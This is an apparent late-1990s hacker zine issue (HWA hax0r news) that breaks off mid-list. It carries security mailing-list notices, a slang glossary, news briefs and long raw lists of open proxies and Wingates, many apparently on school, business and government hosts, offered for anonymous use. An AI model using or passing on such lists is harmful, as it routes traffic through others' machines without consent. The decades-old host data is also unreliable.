Announcements, advisories or warnings + Ideas, future plans or current works dealing with Unix security + Information material regarding vendor contacts and procedures + Individual experiences in dealing with above vendors or security organizations + Incident advisories or informational reporting Any non-essential replies should not be directed to the list but to the originator of the message. Please do not "CC" the bugtraq reflector address if the response does not meet the above criteria. Remember: YOYOW. You own your own words. This means that you are responsible for the words that you post on this list and that reproduction of those words without your permission in any medium outside the distribution of this list may be challenged by you, the author. For questions or comments, please mail me: chasin@crimelab.com (Scott Chasin) UPDATED Sept/99 - Sent in by Androthi, tnx for the update ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ I am pleased to inform you of several changes that will be occurring on June 5th. I hope you find them as exciting as I do. BUGTRAQ moves to a new home --------------------------- First, BUGTRAQ will be moving from its current home at NETSPACE.ORG to SECURITYFOCUS.COM. What is Security Focus you ask? Wait and read below. Other than the change of domains nothing of how the list is run changes. I am still the moderator. We play by the same rules. Security Focus will be providing mail archives for BUGTRAQ. The archives go back longer than Netspace's and are more complete than Geek-Girl's. The move will occur one week from today. You will not need to resubscribe. All your information, including subscription options will be moved transparently. Any of you using mail filters (e.g. procmail) to sort incoming mail into mail folders by examining the From address will have to update them to include the new address. The new address will be: BUGTRAQ@SECURITYFOCUS.COM Security Focus also be providing a free searchable vulnerability database. BUGTRAQ es muy bueno -------------------- It has also become apparent that there is a need for forums in the spirit of BUGTRAQ where non-English speaking people or people that don't feel comfortable speaking English can exchange information. As such I've decided to give BUGTRAQ in other languages a try. BUGTRAQ will continue to be the place to submit vulnerability information, but if you feel more comfortable using some other language you can give the other lists a try. All relevant information from the other lists which have not already been covered here will be translated and forwarded on by the list moderator. In the next couple of weeks we will be introducing BUGTRAQ-JP (Japanese) which will be moderated by Nobuo Miwa and BUGTRAQ-SP (Spanish) which will be moderated by CORE SDI S.A. from Argentina (the folks that brought you Secure Syslog and the SSH insertion attack). What is Security Focus? ----------------------- Security Focus is an exercise in creating a community and a security resource. We hope to be able to provide a medium where useful and successful resources such as BUGTRAQ can occur, while at the same time providing a comprehensive source of security information. Aside from moving just BUGTRAQ over, the Geek-Girl archives (and the Geek Girl herself!) have moved over to Security Focus to help us with building this new community. The other staff at Security Focus are largely derived from long time supporters of Bugtraq and the community in general. If you are interested in viewing the staff pages, please see the 'About' section on www.securityfocus.com. On the community creating front you will find a set of forums and mailing lists we hope you will find useful. A number of them are not scheduled to start for several weeks but starting today the following list is available: * Incidents' Mailing List. BUGTRAQ has always been about the discussion of new vulnerabilities. As such I normally don't approve messages about break-ins, trojans, viruses, etc with the exception of wide spread cases (Melissa, ADM worm, etc). The other choice people are usually left with is email CERT but this fails to communicate this important information to other that may be potentially affected. The Incidents mailing list is a lightly moderated mailing list to facilitate the quick exchange of security incident information. Topical items include such things as information about rootkits new trojan horses and viruses, source of attacks and tell-tale signs of intrusions. To subscribe email LISTSERV@SECURITYFOCUS.COM with a message body of: SUBS INCIDENTS FirstName, LastName Shortly we'll also be introducing an Information Warfare forum along with ten other forums over the next two months. These forums will be built and moderated by people in the community as well as vendors who are willing to take part in the community building process. *Note to the vendors here* We have several security vendors who have agreed to run forums where they can participate in the online communities. If you would like to take part as well, mail Alfred Huger, ahuger@securityfocus.com. On the information resource front you find a large database of the following: * Vulnerabilities. We are making accessible a free vulnerability database. You can search it by vendor, product and keyword. You will find detailed information on the vulnerability and how to fix it, as well are links to reference information such as email messages, advisories and web pages. You can search by vendor, product and keywords. The database itself is the result of culling through 5 years of BUGTRAQ plus countless other lists and news groups. It's a shining example of how thorough full disclosure has made a significant impact on the industry over the last half decade. * Products. An incredible number of categorized security products from over two hundred different vendors. * Services. A large and focused directory of security services offered by vendors. * Books, Papers and Articles. A vast number of categorized security related books, papers and articles. Available to download directly for our servers when possible. * Tools. A large array of free security tools. Categorized and available for download. * News: A vast number of security news articles going all the way back to 1995. * Security Resources: A directory to other security resources on the net. As well as many other things such as an event calendar. For your convenience the home-page can be personalized to display only information you may be interested in. You can filter by categories, keywords and operating systems, as well as configure how much data to display. I'd like to thank the fine folks at NETSPACE for hosting the site for as long as they have. Their services have been invaluable. I hope you find these changes for the best and the new services useful. I invite you to visit http://www.securityfocus.com/ and check it out for yourself. If you have any comments or suggestions please feel free to contact me at this address or at aleph1@securityfocus.com. Cheers. -- Aleph One / aleph1@underground.org http://underground.org/ KeyID 1024/948FD6B5 Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01 Crypto-Gram ~~~~~~~~~~~ CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses, insights, and commentaries on cryptography and computer security. To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a blank message to crypto-gram-subscribe@chaparraltree.com.  To unsubscribe, visit http://www.counterpane.com/unsubform.html.  Back issues are available on http://www.counterpane.com. CRYPTO-GRAM is written by Bruce Schneier.  Schneier is president of Counterpane Systems, the author of "Applied Cryptography," and an inventor of the Blowfish, Twofish, and Yarrow algorithms.  He served on the board of the International Association for Cryptologic Research, EPIC, and VTW.  He is a frequent writer and lecturer on cryptography. CUD Computer Underground Digest ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This info directly from their latest ish: Computer underground Digest    Sun  14 Feb, 1999   Volume 11 : Issue 09                             ISSN  1004-042X        Editor: Jim Thomas (cudigest@sun.soci.niu.edu)        News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)        Archivist: Brendan Kehoe        Poof Reader:   Etaion Shrdlu, Jr.        Shadow-Archivists: Dan Carosone / Paul Southworth                           Ralph Sims / Jyrki Kuoppala                           Ian Dickinson        Cu Digest Homepage: http://www.soci.niu.edu/~cudigest [ISN] Security list ~~~~~~~~~~~~~~~~~~~ This is a low volume list with lots of informative articles, if I had my way i'd reproduce them ALL here, well almost all .... ;-) - Ed UPDATED Sept/99 - Sent in by Androthi, tnx for the update ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ --[ New ISN announcement (New!!) Sender: ISN Mailing List From: mea culpa Subject: Where has ISN been? Comments: To: InfoSec News To: ISN@SECURITYFOCUS.COM It all starts long ago, on a network far away.. Not really. Several months ago the system that hosted the ISN mail list was taken offline. Before that occured, I was not able to retrieve the subscriber list. Because of that, the list has been down for a while. I opted to wait to get the list back rather than attempt to make everyone resubscribe. As you can see from the headers, ISN is now generously being hosted by Security Focus [www.securityfocus.com]. THey are providing the bandwidth, machine, and listserv that runs the list now. Hopefully, this message will find all ISN subscribers, help us weed out dead addresses, and assure you the list is still here. If you have found the list to be valuable in the past, please tell friends and associates about the list. To subscribe, mail listserv@securityfocus.com with "subscribe isn firstname lastname". To unsubscribe, "unsubscribe isn". As usual, comments and suggestions are welcome. I apologize for the down time of the list. Hopefully it won't happen again. ;) mea_culpa www.attrition.org --[ Old ISN welcome message [Last updated on: Mon Nov 04 0:11:23 1998] InfoSec News is a privately run, medium traffic list that caters to distribution of information security news articles. These articles will come from newspapers, magazines, online resources, and more. The subject line will always contain the title of the article, so that you may quickly and effeciently filter past the articles of no interest. This list will contain: o Articles catering to security, hacking, firewalls, new security encryption, products, public hacks, hoaxes, legislation affecting these topics and more. o Information on where to obtain articles in current magazines. o Security Book reviews and information. o Security conference/seminar information. o New security product information. o And anything else that comes to mind.. Feedback is encouraged. The list maintainers would like to hear what you think of the list, what could use improving, and which parts are "right on". Subscribers are also encouraged to submit articles or URLs. If you submit an article, please send either the URL or the article in ASCII text. Further, subscribers are encouraged to give feedback on articles or stories, which may be posted to the list. Please do NOT: * subscribe vanity mail forwards to this list * subscribe from 'free' mail addresses (ie: juno, hotmail) * enable vacation messages while subscribed to mail lists * subscribe from any account with a small quota All of these generate messages to the list owner and make tracking down dead accounts very difficult. I am currently receiving as many as fifty returned mails a day. Any of the above are grounds for being unsubscribed. You are welcome to resubscribe when you address the issue(s). Special thanks to the following for continued contribution: William Knowles, Aleph One, Will Spencer, Jay Dyson, Nicholas Brawn, Felix von Leitner, Phreak Moi and other contributers. ISN Archive: ftp://ftp.repsec.com/pub/text/digests/isn ISN Archive: http://www.landfield.com/isn ISN Archive: http://www.jammed.com/Lists/ISN/ ISN is Moderated by 'mea_culpa' . ISN is a private list. Moderation of topics, member subscription, and everything else about the list is solely at his discretion. The ISN membership list is NOT available for sale or disclosure. ISN is a non-profit list. Sponsors are only donating to cover bandwidth and server costs. Win2k Security Advice Mailing List (new added Nov 30th) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ To subscribe: send "SUBSCRIBE WIN2KSECADVICE anonymous or name" in the message body to listserv@listserv.ntsecurity.net Welcome to Win2K Security Advice! Thank you for subscribing. If you have any questions or comments about the list please feel free to contact the list moderator, Steve Manzuik, at steve@win2ksecadvice.net. To see what you've missed recently on the list, or to research an item of interest, be sure to visit the Web-based archives located at: http://www.ntsecurity.net/scripts/page_listserv.asp?s=win2ksec ============== NTSecurity.net brings the security community a brand new (Oct 99) and much-requested Windows security mailing list. This new moderated mailing list, Win2KSecAdvice (formerly NTSecAdvice,) is geared towards promoting the open discussion of Windows-related security issues. With a firm and unwavering commitment towards timely full disclosure, this new resource promises to become a great forum for open discussion regarding security-related bugs, vulnerabilities, potential exploits, virus, worms, Trojans, and more. Win2KSecAdvice promotes a strong sense of community and we openly invite all security minded individuals, be they white hat, gray hat, or black hat, to join the new mailing list. While Win2KSecAdvice was named in the spirit of Microsoft's impending product line name change, and meant to reflect the list's security focus both now and in the long run, it is by no means limited to security topics centered around Windows 2000. Any security issues that pertain to Windows-based networking are relevant for discussion, including all Windows operating systems, MS Office, MS BackOffice, and all related third party applications and hardware. The scope of Win2KSecAdvice can be summarized very simply: if it's relevant to a security risk, it's relevant to the list. The list archives are available on the Web at http://www.ntsecurity.net, which include a List Charter and FAQ, as well as Web-based searchable list archives for your research endeavors. SAVE THIS INFO FOR YOUR REFERENCE: To post to the list simply send your email to win2ksecadvice@listserv.ntsecurity.net To unsubscribe from this list, send UNSUBSCRIBE WIN2KSECADVICE to listserv@listserv.ntsecurity.net Regards, Steve Manzuik, List Moderator Win2K Security Advice steve@win2ksecadvice.net @HWA 00.3 THIS IS WHO WE ARE ~~~~~~~~~~~~~~~~~~ __ ___ ___ \ \ / / |__ ___ __ _ _ __ _____ ____|__ \ \ \ /\ / /| '_ \ / _ \ / _` | '__/ _ \ \ /\ / / _ \/ / \ V V / | | | | (_) | (_| | | | __/\ V V / __/_| \_/\_/ |_| |_|\___/ \__,_|_| \___| \_/\_/ \___(_) Some HWA members and Legacy staff ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ cruciphux@dok.org.........: currently active/editorial darkshadez@ThePentagon.com: currently active/man in black fprophet@dok.org..........: currently active/programming/IRC+ man in black sas2@usa.net .............. currently active/IRC+ distribution vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black dicentra...(email withheld): IRC+ grrl in black twisted-pair@home.com......: currently active/programming/IRC+ Foreign Correspondants/affiliate members (Active) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Qubik ............................: United Kingdom D----Y ...........................: USA/world media Zym0t1c ..........................: Dutch/Germany/Europe Sla5h.............................: Croatia HWA members ......................: World Media Past Foreign Correspondants (currently inactive or presumed dead) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ N0Portz ..........................: Australia system error .....................: Indonesia Wile (wile coyote) ...............: Japan/the East Ruffneck ........................: Netherlands/Holland Wyze1.............................: South Africa Please send in your sites for inclusion here if you haven't already also if you want your emails listed send me a note ... - Ed Spikeman's site is down as of this writing, if it comes back online it will be posted here. http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian) Sla5h's email: smuddo@yahoo.com ******************************************************************* *** /join #HWA.hax0r.news on EFnet the key is `zwen' *** ******************************************************************* :-p 1. We do NOT work for the government in any shape or form.Unless you count paying taxes ... in which case we work for the gov't in a BIG WAY. :-/ 2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news events its a good idea to check out issue #1 at least and possibly also the Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ... @HWA 00.4 Whats in a name? why HWA.hax0r.news?? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Well what does HWA stand for? never mind if you ever find out I may have to get those hax0rs from 'Hackers' or the Pretorians after you. In case you couldn't figure it out hax0r is "new skewl" and although it is laughed at, shunned, or even pidgeon holed with those 'dumb leet (l33t?) dewds' this is the state of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you up and comers, i'd highly recommend you get that book. Its almost like buying a clue. Anyway..on with the show .. - Editorial staff @HWA 00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ _ ___ ___ _____ _ ___ | | | \ \ / / \ | ___/ \ / _ \ | |_| |\ \ /\ / / _ \ | |_ / _ \| | | | | _ | \ V V / ___ \ _| _/ ___ \ |_| | |_| |_| \_/\_/_/ \_(_)_|/_/ \_\__\_\ Also released in issue #3. (revised) check that issue for the faq it won't be reprinted unless changed in a big way with the exception of the following excerpt from the FAQ, included to assist first time readers: Some of the stuff related to personal useage and use in this zine are listed below: Some are very useful, others attempt to deny the any possible attempts at eschewing obfuscation by obsucuring their actual definitions. @HWA - see EoA ;-) != - Mathematical notation "is not equal to" or "does not equal" ASC(247) "wavey equals" sign means "almost equal" to. If written an =/= (equals sign with a slash thru it) also means !=, =< is Equal to or less than and => is equal to or greater than (etc, this aint fucking grade school, cripes, don't believe I just typed all that..) AAM - Ask a minor (someone under age of adulthood, usually <16, <18 or <21) AOL - A great deal of people that got ripped off for net access by a huge clueless isp with sekurity that you can drive buses through, we're not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the least they could try leasing one?? *CC - 1 - Credit Card (as in phraud) 2 - .cc is COCOS (Keeling) ISLANDS butthey probably accept cc's CCC - Chaos Computer Club (Germany) *CON - Conference, a place hackers crackers and hax0rs among others go to swap ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk watch videos and seminars, get drunk, listen to speakers, and last but not least, get drunk. *CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker speak he's the guy that breaks into systems and is often (but by no means always) a "script kiddie" see pheer 2 . An edible biscuit usually crappy tasting without a nice dip, I like jalapeno pepper dip or chives sour cream and onion, yum - Ed Ebonics - speaking like a rastafarian or hip dude of colour also wigger Vanilla Ice is a wigger, The Beastie Boys and rappers speak using ebonics, speaking in a dark tongue ... being ereet, see pheer EoC - End of Commentary EoA - End of Article or more commonly @HWA EoF - End of file EoD - End of diatribe (AOL'ers: look it up) FUD - Coined by Unknown and made famous by HNN - "Fear uncertainty and doubt", usually in general media articles not high brow articles such as ours or other HNN affiliates ;) du0d - a small furry animal that scurries over keyboards causing people to type weird crap on irc, hence when someone says something stupid or off topic 'du0d wtf are you talkin about' may be used. *HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R *HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to define, I think it is best defined as pop culture's view on The Hacker ala movies such as well erhm "Hackers" and The Net etc... usually used by "real" hackers or crackers in a derogatory or slang humorous way, like 'hax0r me some coffee?' or can you hax0r some bread on the way to the table please?' 2 - A tool for cutting sheet metal. HHN - Maybe a bit confusing with HNN but we did spring to life around the same time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper noun means the hackernews site proper. k? k. ;& HNN - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html J00 - "you"(as in j00 are OWN3D du0d) - see 0wn3d MFI/MOI- Missing on/from IRC NFC - Depends on context: No Further Comment or No Fucking Comment NFR - Network Flight Recorder (Do a websearch) see 0wn3d NFW - No fuckin'way *0WN3D - You are cracked and owned by an elite entity see pheer *OFCS - Oh for christ's sakes PHACV - And variations of same Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare Alternates: H - hacking, hacktivist C - Cracking C - Cracking V - Virus W - Warfare A - Anarchy (explosives etc, Jolly Roger's Cookbook etc) P - Phreaking, "telephone hacking" PHone fREAKs ... CT - Cyber Terrorism *PHEER - This is what you do when an ereet or elite person is in your presence see 0wn3d *RTFM - Read the fucking manual - not always applicable since some manuals are pure shit but if the answer you seek is indeed in the manual then you should have RTFM you dumb ass. TBC - To Be Continued also 2bc (usually followed by ellipses...) :^0 TBA - To Be Arranged/To Be Announced also 2ba TFS - Tough fucking shit. *w00t - 1 - Reserved for the uber ereet, noone can say this without severe repercussions from the underground masses. also "w00ten" 2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers) *wtf - what the fuck, where the fuck, when the fuck etc .. *ZEN - The state you reach when you *think* you know everything (but really don't) usually shortly after reaching the ZEN like state something will break that you just 'fixed' or tweaked. @HWA -=- :. .: -=- 01.0 Greets!?!?! yeah greets! w0w huh. - Ed ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ____ _ / ___|_ __ ___ ___| |_ ___ | | _| '__/ _ \/ _ \ __/ __| | |_| | | | __/ __/ |_\__ \ \____|_| \___|\___|\__|___/ Thanks to all in the community for their support and interest but i'd like to see more reader input, help me out here, whats good, what sucks etc, not that I guarantee i'll take any notice mind you, but send in your thoughts anyway. * all the people who sent in cool emails and support FProphet Pyra TwstdPair _NeM_ D----Y Dicentra vexxation sAs72 Spikeman p0lix Vortexia Wyze1 Pneuma Raven Zym0t1c duro Repluzer astral BHZ ScrewUp Qubik gov-boi _Jeezus_ Haze_ thedeuce ytcracker loophole BlkOps Folks from #hwa.hax0r,news and #fawkerz, and other leet secret channels ... ;-) Ken Williams/tattooman ex-of PacketStorm, & Kevin Mitnick kewl sites: + http://www.hack.co.za NEW + http://blacksun.box.sk. NEW + http://packetstorm.securify.com/ NEW + http://www.securityportal.com/ NEW + http://www.securityfocus.com/ NEW + http://www.hackcanada.com/ + http://www.l0pht.com/ + http://www.2600.com/ + http://www.freekevin.com/ + http://www.genocide2600.com/ + http://www.hackernews.com/ (Went online same time we started issue 1!) + http://www.net-security.org/ + http://www.slashdot.org/ + http://www.freshmeat.net/ + http://www.403-security.org/ + http://ech0.cjb.net/ @HWA 01.1 Last minute stuff, rumours and newsbytes ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "What is popular isn't always right, and what is right isn't always popular..." - FProphet '99 +++ When was the last time you backed up your important data? ++ Hackers: Governments hacks pointless Contributed by Zym0t1c The Feds aren't the only ones who don't approve of hacker attacks on several government Web sites. Some hackers are also condemning the exploits, calling them juvenile and pointless. Read the article at: http://www.zdnet.com/zdnn/stories/news/0,4586,2269312,00.html?chkpt=zdnnsmsa ++ Hackers say they'll take off New Year's Contributed by Zym0t1c Two hacking groups have struck again, defacing several Web pages around the Internet. This time, however, they have a message for others looking to circumvent security on the Net: Don't hack over the New Year's weekend. Read the article at: http://www.zdnet.com/zdnn/stories/news/0,4586,2413134,00.html ++ A Hacker Christmas Contributed by Zym0t1c Last-minute gift purchases for the hacker in the house, by Kevin Poulsen. Read the article at: http://www.zdnet.com/zdtv/cybercrime/chaostheory/story/0,3700,2412532,00.html?chkpt=zdnnsmsa ++ Government asks hackers for Y2K break Contributed by Zym0t1c WASHINGTON - President Clinton's top aide on Y2K matters has urged computer hackers to exercise self-restraint until after year 2000 technology fears largely have passed. Read the article at: http://www.zdnet.com/zdnn/stories/news/0,4586,2408969,00.html?chkpt=zdnnsmsa ++ 'Net Attack' program threatens Internet sites Contributed by Zym0t1c Just before New Year, a new version of the so called 'Net Attack' or Tribe Flood Network (TFN) program was released. This version, TFN2K, is much more powerful and more difficult to detect. Experts fear that hackers will use TFN to hack into networks while everybody is celebrating New Year. Read the dutch article at: http://www.zdnet-be.com/zdbe.asp?ch=NI&artid=3749 Thanks to myself for providing the info from my wired news feed and others from whatever sources, also to Spikeman for sending in past entries.... - Ed @HWA 01.2 MAILBAG - email and posts from the message board worthy of a read ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Yeah we have a message board, feel free to use it, remember there are no stupid questions... well there are but if you ask something really dumb we'll just laugh at ya, lets give the message board a bit more use eh? i'll be using a real message board when the hwa-iwa.org domain comes back online (soon) meanwhile the beseen board is still up... ============================================================================== 02.0 From the editor. ~~~~~~~~~~~~~~~~ #include #include #include main() { printf ("Read commented source!\n\n"); /* * w00t merry Christmas, Happy Hannukah or however the * fuck you spell it and Merry Yuletide etc etc oh ya * and Ramadan (Yeah I know its not this time of year * whatever, religion isn't what this is about), anyway * happy holidays and enjoy a new fun packed issue of HWA * complete with yer favourite info and proxy lists, smurf * amplifiers and some leet exploits.... werd up, and * get securing those boxes! hope you don't get called in * to fix script-kiddy damage over the holidays! * * Cruci * * cruciphux@dok.org * ICQ:58939315 note; not always online, do not abuse! * Preffered chat method: IRC Efnet in #HWA.hax0r.news * */ printf ("EoF.\n"); } Snailmail: HWA NEWS P.O BOX 44118 370 MAIN ST. NORTH BRAMPTON, ONTARIO CANADA L6V 4H5 Congrats, thanks, articles, news submissions and kudos to us at the main address: hwa@press.usmc.net complaints and all nastygrams and mai*lbombs can go to /dev/nul nukes, synfloods and papasmurfs to 127.0.0.1, private mail to cruciphux@dok.org danke. C*:. -= start =--= start =--= start =--= start =--= start =--= start =--= start ____ _ _ / ___|___ _ __ | |_ ___ _ __ | |_ | | / _ \| '_ \| __/ _ \ '_ \| __| | |__| (_) | | | | || __/ | | | |_ \____\___/|_| |_|\__\___|_| |_|\__| / ___|| |_ __ _ _ __| |_ \___ \| __/ _` | '__| __| ___) | || (_| | | | |_ |____/ \__\__,_|_| \__| -= start =--= start =--= start =--= start =--= start =--= start =--= Tip of the week: .us domains are free of charge to register. http://www.nic.us/usdom-overview.html#Cost of course you need to be in the .us to use this (or figure out a way to phake it) *g* 03.0 Socks proxies, Wingates and more from IRC4ALL ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Contributed by: HWA Staff (Yeah -Ed :-p) WELL MAINTAINED and updated site. Check it out for proxy info. highly recommended - Ed. This site is located at http://www.lightspeed.de/irc4all/ No formatting, data is presented raw direct from site. Most proxies are socks4 or 5, wingates are 4, ports are commonly 1080 or 8080 if you don't know how to use these don't use them! - Ed Common ports for proxy use: Port Wingate service ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 21 FTP Proxy Server 23 Telnet Proxy Server 53 DNS Proxy Server 80 WWW Proxy Server 110 POP3 Proxy Server 808 Remote Control Service 1080 SOCKS Proxy Server 1090 Real Audio Proxy Server 7000 VDOlive Proxy Server 8000 XDMA Proxy Server 8010 Log Service Not all services will work on all proxies/wingates, you will have to play with them and try them out. Also admins close these down frequently but there ARE active useable proxies on the following lists, Play nice and don't over use or abuse. - Ed NotFound,200.36.19.225, NotFound,206.103.12.131, NotFound,210.56.18.225, NotFound,210.56.18.226, NotFound,210.56.18.241, NotFound,200.248.68.129, NotFound,210.56.18.253, NotFound,200.248.69.50, noeljo9.lnk.telstra.net,139.130.54.153, modemcable215.2-200-24.hull.mc.videotron.net,24.200.2.215, edtn004203.hs.telusplanet.net,161.184.152.139, NotFound,195.14.148.98, blissr.lnk.telstra.net,139.130.54.131, PPP46-166.lvsb.vsnl.net.in,202.54.46.166, cr216724724.cable.net.co,216.72.47.24, cr216724718.cable.net.co,216.72.47.18, 122-94.w3.com.uy,207.3.122.94, saward.lnk.telstra.net,139.130.55.98, icqtwsrv1.maiowoo.com,203.135.240.3, NotFound,212.22.69.35, 122-85.w3.com.uy,207.3.122.85, gw.eudynelson.com,207.176.25.66, sis-zeus.sville.edu.ph,207.0.119.67, dns-server1.tj.pa.gov.br,200.242.244.1, theleu.lnk.telstra.net,139.130.74.160, 210-55-191-125.ipnets.xtra.co.nz,210.55.191.125, nor24788-1.gw.connect.com.au,202.21.13.46, NotFound,210.161.200.82, www.slcr.cz,212.27.210.65, NotFound,210.56.19.5, northeastmicro.com,204.170.187.254, NotFound,195.5.33.222, marina.amakusa.gr.jp,210.164.238.50, h0040053c7824.ne.mediaone.net,24.128.48.55, NotFound,216.72.45.152, tconl9076.tconl.com,204.26.90.76, NotFound,193.227.185.210, NotFound,194.243.99.199, NotFound,202.54.48.85, NotFound,200.21.157.61, server.goway.com,205.206.42.162, web.urudata.com.uy,207.3.122.84, cr2167248104.cable.net.co,216.72.48.104, frontier.netline.net.au,203.28.52.160, interate.com.pe,209.45.73.174, 210-55-191-126.ipnets.xtra.co.nz,210.55.191.126, com3058-2.gw.connect.com.au,202.21.8.108, PPP46-254.lvsb.vsnl.net.in,202.54.46.254, NotFound,195.14.148.99, ibp.santa.krs.ru,195.161.57.133, mail.theova.com,195.14.148.65, cr2167254143.cable.net.co,216.72.54.143, NotFound,142.250.6.2, plebiscito.synapsis.it,195.31.227.14, ipshome-gw.iwahashi.co.jp,210.164.242.146, other.issei-dc.co.jp,210.164.241.99, x1-6-00-60-b0-66-08-f7.cust.planetcable.net,24.137.18.44, NotFound,209.177.38.98, www.ymts.sakha.ru,194.186.182.2, mail.ermanco.com,12.2.82.130, mail1.bikesusa.com,207.176.25.114, ewwmail.ozemail.com.au,203.108.128.242, modemcable106.22-200-24.timi.mc.videotron.net,24.200.22.106, patter.lnk.telstra.net,139.130.81.160, server.hirup.khmelnitskiy.ua,195.230.134.227, port58151.btl.net,206.153.58.151, wdpcbalt.wdpc.com,208.222.211.65, dns.gincorp.co.jp,210.164.86.34, ts18.svamberk.cz,212.47.11.231, mail.coolmore.com.au,203.12.145.98, NotFound,195.14.148.101, cr216724770.cable.net.co,216.72.47.70, ip110.gte5.rb1.bel.nwlink.com,209.20.218.110, ci272608-a.sptnbrg1.sc.home.com,24.4.115.144, edsl78.mpls.uswest.net,209.181.225.79, NotFound,210.114.231.130, mooty.lnk.telstra.net,139.130.81.14, NotFound,168.187.78.34, NotFound,203.116.5.58, c111.h202052116.is.net.tw,202.52.116.111, cr2167251178.cable.net.co,216.72.51.178, altona.lnk.telstra.net,139.130.80.123, NotFound,139.130.59.187, nevisco.city.tvnet.hu,195.38.100.242, edtn003590.hs.telusplanet.net,161.184.150.34, NotFound,193.15.227.125, dns1.ctsjp.co.jp,210.172.87.146, gaon.zg.szczecin.pl,195.116.25.98, NotFound,195.5.33.218, edtn003331.hs.telusplanet.net,161.184.149.29, edtn003725.hs.telusplanet.net,161.184.150.169, dt027n36.san.rr.com,24.30.137.54, tsp-proxy.tsss.com,12.2.81.50, austra53.lnk.telstra.net,139.130.56.114, NotFound,195.161.69.65, modemcable118.21-200-24.timi.mc.videotron.net,24.200.21.118, cascad.lnk.telstra.net,139.130.44.197, edtn003171.hs.telusplanet.net,161.184.148.123, tob24399-1.gw.connect.com.au,202.21.14.234, ad112-162.magix.com.sg,165.21.112.162, NotFound,195.146.98.226, NotFound,193.232.250.133, lesy.vol.cz,212.27.211.5, HSE-Montreal-ppp32859.qc.sympatico.ca,216.209.195.103, north.ocs.k12.al.us,216.77.56.66, adsl-98.cais.com,207.176.4.98, modemcable161.21-200-24.timi.mc.videotron.net,24.200.21.161, NotFound,195.146.97.178, fsf.santa.krs.ru,195.161.57.178, HSE-Montreal-ppp32305.qc.sympatico.ca,216.209.193.57, ohs.ocs.k12.al.us,216.77.56.122, NotFound,195.14.148.100, carver.ocs.k12.al.us,216.77.56.114, oms.ocs.k12.al.us,216.77.56.106, C824154A.podernet.com.mx,200.36.21.74, NotFound,193.15.228.156, wingate.shokoren.or.jp,210.145.221.99, cpu1555.adsl.bellglobal.com,206.47.27.36, NotFound,195.14.148.97, expocom.dial-up.cz,193.85.249.31, edtn003655.hs.telusplanet.net,161.184.150.99, mb-kop-p2.mbusa.net,63.65.123.172, www.sos.iqnet.cz,212.71.157.102, jeter.ocs.k12.al.us,216.77.56.98, modemcable241.4-200-24.hull.mc.videotron.net,24.200.4.241, ip48.gte5.rb1.bel.nwlink.com,209.20.218.48, sai0103.erols.com,207.96.118.243, wforest.ocs.k12.al.us,216.77.56.82, 165-246.tr.cgocable.ca,24.226.165.246, morris.ocs.k12.al.us,216.77.56.74, ken9029.tsukuba.accs.or.jp,210.154.99.29, www.cassvillesd.k12.wi.us,216.56.42.3, ns.elaso.cz,195.146.96.178, proxy.wmisd.k12.mi.us,199.176.179.4, Public Proxies ~~~~~~~~~~~~~~ Non transparent proxies, suggest you use http://www.lightspeed.de/irc4all/ to test these when playing with them to see what info is passed. Location Provider URL Port Protocol AE pd4k-2.emirates.net.ae 8080 WWW / FTP AR proxyweb2.ssdnet.com.ar 8080 WWW / FTP AT erde.salzburg.at 8080 WWW / FTP AU Hutchisons T. proxy.hutch.com.au 80 WWW / FTP AU OzEmail netcachesyd3.ozemail.com.au 8080 WWW / FTP BE Government lino.privacy.fgov.be 8080 WWW / FTP BN Brunei proxy1.brunet.bn 8080 WWW / FTP BR Telemar CAICO.telern.com.br 80 WWW / FTP CA Csjlor www.csjlor.qc.ca 8080 WWW / FTP CA RAPIDUS 237-67-239.tr.cgocable.ca 80 WWW / FTP CH proxy.vtx.ch 8080 WWW / FTP COM IWVISP proxy.iwvisp.com 8080 WWW / FTP COM HRO gateway.hro.com 8080 WWW / FTP COM RipNET IS CacheFlow01.RipNET.com 8080 WWW / FTP CZ inet01.cabletel.cz 80 WWW / FTP CO Compunet proxy.compunet.net.co 3128 WWW / FTP DE TU Berlin andele.cs.tu-berlin.de 80 WWW / FTP DE Uni-Kl. maccaroni.unix-ag.uni-kl.de 3128 WWW / FTP DE ibaserver.ub.uni-dortmund.de 